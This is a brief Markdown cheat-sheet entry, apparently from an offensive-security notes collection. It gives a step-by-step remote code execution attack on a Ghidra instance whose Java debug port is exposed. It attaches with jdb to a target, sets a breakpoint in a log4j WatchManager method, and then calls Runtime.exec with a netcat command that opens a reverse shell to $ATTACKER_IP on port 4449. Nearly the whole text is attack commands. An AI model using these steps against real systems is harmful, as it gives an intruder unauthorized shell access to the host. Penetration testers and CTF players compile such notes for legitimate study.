killchain-compendium/exploit/java/ghidra_debug.md

20 lines
403 B
Markdown

# Ghidra Debug RCE
* If debug mode is enabled, connect to it via `jdb`
```sh
jdb -attach $TARGET_IP:$TARGET_PORT
```
```sh
classpath
classes
```
* Stop the service
```sh
stop in org.apache.logging.log4j.core.util.WatchManager$WatchRunnable.run()
```
* Wait until the breakpoint hits and start a reverse shell
```sh
print new java.lang.Runtime().exec("nc.traditional $ATTACKER_IP 4449 -e /bin/sh")
```